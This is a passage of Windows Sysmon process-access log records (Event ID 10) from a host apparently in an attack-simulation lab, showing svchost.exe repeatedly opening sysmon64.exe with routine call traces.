06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 